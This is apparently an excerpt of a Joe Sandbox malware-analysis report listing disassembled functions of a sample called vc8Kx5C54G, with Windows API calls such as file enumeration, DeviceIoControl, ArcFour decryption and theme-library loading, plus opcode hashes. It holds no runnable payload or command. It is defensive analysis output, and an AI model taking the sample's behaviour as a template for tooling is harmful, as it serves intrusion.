                                                    • API String ID: 1646373207-3712701948
                                                    • Opcode ID: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                    • Instruction ID: 94d637f012244594286cd058a6e690650624bbac00cb131118490790a059a9ff
                                                    • Opcode Fuzzy Hash: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                    • Instruction Fuzzy Hash: F6416271A04649ABCF01EFA5C892DEEB7B8EF48304F504566E800F7292D6785E09CB68
                                                    APIs
                                                    • IsIconic.USER32(?), ref: 00417D07
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$Placement$Iconic
                                                    • String ID: ,
                                                    • API String ID: 568898626-3772416878
                                                    • Opcode ID: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                    • Instruction ID: 4a262c2e3c05075ab76cb34d6dc8316acc681754e7f1d5d7fcc9d539da6ecccc
                                                    • Opcode Fuzzy Hash: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                    • Instruction Fuzzy Hash: A9213E716002089BDF10EFA9D8C0ADA77B8AF58314F15416AFE19DF246D638ED44CBA8
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001,00000000,00463CC1), ref: 00463B35
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463BC4
                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C56
                                                    • FindClose.KERNEL32(000000FF,00463C7D,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C70
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                    • String ID:
                                                    • API String ID: 4011626565-0
                                                    • Opcode ID: 9e4b21a255c9957acc66722b8fb030e028549ea653889a09ad31eb4a852fe968
                                                    • Instruction ID: 72b898f2585741bb0186620e4596b31eb4d76daf54761f31677757d41602065f
                                                    • Opcode Fuzzy Hash: 9e4b21a255c9957acc66722b8fb030e028549ea653889a09ad31eb4a852fe968
                                                    • Instruction Fuzzy Hash: E941B971A00A54AFCB10EF65CC55ADEB7B8EB88705F4044BAF404B7381E67C9F488E19
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001,00000000,00464167), ref: 00463FF5
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046403B
                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 004640F0
                                                    • FindClose.KERNEL32(000000FF,0046411B,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046410E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                    • String ID:
                                                    • API String ID: 4011626565-0
                                                    • Opcode ID: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                    • Instruction ID: c50a8f924641f435bcadfb0116f3895028b18db14577d5a571763064cbfe8c6c
                                                    • Opcode Fuzzy Hash: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                    • Instruction Fuzzy Hash: 77417674A00A18DFCB11EFA5CD859DEB7B8FB88315F4044AAF804A7341E7789E858E59
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E94E
                                                    • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E979
                                                    • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E986
                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E98E
                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E994
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 1177325624-0
                                                    • Opcode ID: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                    • Instruction ID: 3f40d390e8a5df174f84cdc2f44e01f6cfa8788c97922530efddc0b1fccee370
                                                    • Opcode Fuzzy Hash: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                    • Instruction Fuzzy Hash: 31F0CDB23A17207AF520717A5C86F6B018CC789B68F10823BBB04FF1C1E9A85D0545AD
                                                    APIs
                                                    • IsIconic.USER32(?), ref: 00482F36
                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00482F54
                                                    • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F76
                                                    • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F8A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$IconicLong
                                                    • String ID:
                                                    • API String ID: 2754861897-0
                                                    • Opcode ID: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                    • Instruction ID: 41c7b109e84caadfbd7bdb59434551f42a7ac603c048c530ac1057f10a9e5501
                                                    • Opcode Fuzzy Hash: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                    • Instruction Fuzzy Hash: F30152742452009FD600F7A58E89B6B33E55B14304F480977BB009F2E6CAADD841E71C
                                                    APIs
                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C,?,00000000,?,00000000,0046264C), ref: 0046260C
                                                    • FindClose.KERNEL32(000000FF,00462633,0046262C,?,00000000,?,00000000,0046264C), ref: 00462626
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                    • Instruction ID: 35f3f22b183c5d1ecd4ea1753066c09f008546f1eb4ef8afe9bdb694ca888e99
                                                    • Opcode Fuzzy Hash: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                    • Instruction Fuzzy Hash: 07210B31904B047ECB11EB75CC41ACEBBBCDB49304F5084F7A808E21A1E6789E55CE5A
                                                    APIs
                                                    • IsIconic.USER32(?), ref: 004241DC
                                                    • SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
                                                      • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                      • Part of subcall function 00423B0C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021925AC,00424202,?,?,?,0046CB73), ref: 00423B47
                                                    • SetFocus.USER32(00000000,?,?,?,0046CB73), ref: 00424216
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$ActiveFocusIconicShow
                                                    • String ID:
                                                    • API String ID: 649377781-0
                                                    • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                    • Instruction ID: 7ea1460413e76a83717bea1d3364086182948ca7ce33fd4e030d283203b7bb74
                                                    • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                    • Instruction Fuzzy Hash: 5BF03071B0012087CB10AFAA9885B9673B8AB48305F5500BBBD05DF357C67CDC058768
                                                    APIs
                                                    • IsIconic.USER32(?), ref: 00417D07
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$Placement$Iconic
                                                    • String ID:
                                                    • API String ID: 568898626-0
                                                    • Opcode ID: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                    • Instruction ID: 3daf342c44424aa5ce1366acdd2a80e82e5cfeaf10da0033b5167ac39e8fb95c
                                                    • Opcode Fuzzy Hash: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                    • Instruction Fuzzy Hash: BE017C31204108ABDB10EE69ECC1EE773A8AF59324F154166FE09CF242D638EC8087A8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CaptureIconic
                                                    • String ID:
                                                    • API String ID: 2277910766-0
                                                    • Opcode ID: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                    • Instruction ID: 3321041a09622c131d5de1c426c5b9ba37bf97161ea704a377034d17a7c99502
                                                    • Opcode Fuzzy Hash: 9fb93b599f870259b4000da7575617f39aed9b1e5bccbb5d02bb51a51f71ab84
                                                    • Instruction Fuzzy Hash: 2EF0AF7230564157D7209B2EC984ABB62F69F88318B54483FE419CBB61EB78DCC08658
                                                    APIs
                                                    • IsIconic.USER32(?), ref: 00424193
                                                      • Part of subcall function 00423A7C: EnumWindows.USER32(00423A14), ref: 00423AA0
                                                      • Part of subcall function 00423A7C: GetWindow.USER32(?,00000003), ref: 00423AB5
                                                      • Part of subcall function 00423A7C: GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                      • Part of subcall function 00423A7C: SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                    • SetActiveWindow.USER32(?,?,?,00423D6B,00000000,00424154), ref: 004241A7
                                                      • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Window$ActiveEnumIconicLongShowWindows
                                                    • String ID:
                                                    • API String ID: 2671590913-0
                                                    • Opcode ID: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                    • Instruction ID: 714e4cd20337d44954868cb88e5cd3c5f05620b237e6b6751f152470bbecd415
                                                    • Opcode Fuzzy Hash: dcd3cf20cd52624e3855be4655b1b3d00803fdb590b5af4931fd0619bf418583
                                                    • Instruction Fuzzy Hash: 47E01AA070011087EB10AF69DCC9B9632A8BB4C304F5501BABD49CF25BD63CC8608728
                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127CD), ref: 004127BB
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                    • Instruction ID: 515a926e27beec0aab385df702329c93692b8444378934293cf55fba5e442f36
                                                    • Opcode Fuzzy Hash: fadc627793d3d758d03d3b6288103bd692d15878d139e3b8876b7a5e98d728c0
                                                    • Instruction Fuzzy Hash: 4951F335304205CFD714DB6ADA8099BF3E5EF94314B2481ABD815C33A1D7B8ADA2CB48
                                                    APIs
                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004786A2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                    • Instruction ID: b7c0c70f2a783e09ad8744fe0b8a2eb923ce1fb3c3bfc7260a93e3bfca3db08f
                                                    • Opcode Fuzzy Hash: 74fd435c634dc11c163aa08e5e8bd118cd21225c10192b8e8785eef0067adbbd
                                                    • Instruction Fuzzy Hash: 1C416875604104EFCB10CF99C6888AAB7F5FB48311B24C99AE80CEB701DB38EE41DB95
                                                    APIs
                                                    • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D067
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CryptFour
                                                    • String ID:
                                                    • API String ID: 2153018856-0
                                                    • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                    • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                    • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                    • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                    APIs
                                                    • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046D934,?,0046DB15), ref: 0045D07A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2919053297.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.2919025792.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919173049.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919223540.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919251904.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2919284835.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CryptFour
                                                    • String ID:
                                                    • API String ID: 2153018856-0
                                                    • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                    • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                    • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                    • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2920748567.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.2920728910.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000001.00000002.2920780774.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                    • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                    • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                    • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2920748567.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.2920728910.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000001.00000002.2920780774.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                    • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                    • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                      • Part of subcall function 0044B5FC: GetVersionExA.KERNEL32(00000094), ref: 0044B619
                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C1
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7D3
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7E5
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7F7
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B809
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B81B
